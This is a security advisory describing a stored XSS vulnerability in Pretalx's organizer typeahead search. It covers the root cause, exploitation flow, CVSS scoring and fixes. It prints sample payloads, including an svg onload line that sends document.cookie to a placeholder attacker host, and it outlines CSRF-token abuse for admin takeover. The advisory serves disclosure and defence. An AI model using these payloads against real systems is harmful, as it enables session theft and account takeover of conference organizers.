GHSA-CJCX-JFP2-F7M2: High-Severity Stored XSS in Pretalx Organizer Search Interface

Pretalx is an open-source conference planning tool that provides platforms for call for papers (CfP), schedule management, and speaker communication. The platform defines distinct privilege levels, separating unprivileged submitters or speakers from highly privileged conference organizers and administrators. The organizer interface includes a typeahead search functionality designed to quickly locate submissions, speaker profiles, and user accounts.

The vulnerability, tracked as GHSA-CJCX-JFP2-F7M2, is a Stored Cross-Site Scripting (XSS) flaw located in this organizer search feature. It occurs because the frontend application fails to properly sanitize user-supplied data before rendering it in the DOM. This constitutes a CWE-79 violation: Improper Neutralization of Input During Web Page Generation.

By exploiting this vulnerability, an attacker with minimal privileges can store a malicious payload within standard application fields, such as their display name or submission title. When a privileged organizer interacts with the search bar and the attacker's record is returned as a match, the malicious payload executes automatically within the organizer's session context.

The root cause of this vulnerability lies in the frontend JavaScript component responsible for rendering search results in the backend interface. Specifically, the flaw is located within src/pretalx/static/orga/js/base.js. This script handles the asynchronous typeahead search feature utilized by conference organizers.

When an organizer types a query, the frontend queries a backend endpoint to retrieve matching user names, emails, speaker display names, and submission titles. The frontend script iterates through the JSON response and constructs DOM elements for the dropdown menu. During this process, the script insecurely uses the innerHTML property to insert the returned text strings directly into the DOM.

The use of innerHTML for displaying untrusted data forces the browser's HTML parser to evaluate the provided string. Any HTML tags, including <script> or event handlers like onerror on an <img> tag, are executed. The backend API does not enforce strict HTML encoding on these specific fields before returning them to the frontend, relying entirely on the frontend to handle rendering securely.

Exploitation requires the attacker to possess an account on the target Pretalx instance, which is generally open to the public during a Call for Papers phase. The attacker logs in and creates a new proposal or updates their user profile. During this step, the attacker injects a standard XSS vector into a targeted field, such as the Submission Title.

A typical payload looks like <img src=x onerror=alert(document.cookie)> or <svg onload=fetch('https://attacker.com/?cookie='+document.cookie)>. The backend database successfully stores this payload without modification. The attacker then waits for an organizer to utilize the backend search function. The payload is entirely passive until triggered by the victim.

When the organizer types a substring that matches the attacker's manipulated record, the API returns the malicious payload in the search results. The vulnerable JavaScript in base.js writes this payload to the DOM via innerHTML. The browser immediately parses the injected HTML, encounters the error or load event, and executes the embedded JavaScript within the origin of the Pretalx application.

The CVSS v3.1 vector for this vulnerability is CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N, resulting in a base score of 8.7 (High). The impact is severe due to the privilege disparity between the attacker and the likely victim. The vulnerability facilitates horizontal to vertical privilege escalation through session riding.

Once the payload executes, the attacker's script operates with the full privileges of the organizer's active session. The script can read any data accessible to the organizer, including sensitive reviewer notes, private speaker details, and financial data related to the conference. This data can be exfiltrated silently to an external server controlled by the attacker.

Furthermore, the script can issue arbitrary HTTP requests to the Pretalx backend on behalf of the organizer. Since the script runs within the same origin, it can read the application's CSRF token from the DOM and include it in POST requests. This allows the attacker to automate administrative actions, such as modifying the event schedule, deleting submissions, altering system configurations, or granting administrative access to the attacker's account.

The primary remediation for this vulnerability is to upgrade the Pretalx installation to version 2026.1.0 or later. The patch modifies src/pretalx/static/orga/js/base.js to eliminate the use of innerHTML. By replacing innerHTML with textContent or innerText, the browser correctly interprets the user input as raw text rather than executable markup.

If immediate patching is not feasible, administrators can apply a manual mitigation. Operators can edit src/pretalx/static/orga/js/base.js directly on their server to swap the vulnerable DOM manipulation methods for secure text-node assignments. After making this change, the collectstatic management command must be executed to ensure the updated asset is served to clients.

As a temporary operational workaround, conference organizers can be instructed to avoid using the backend search bar entirely. While this degrades the usability of the administrative interface, it eliminates the execution trigger for the payload. Additionally, ensuring that session cookies are flagged with the HttpOnly attribute prevents the XSS payload from directly reading the session identifier via document.cookie.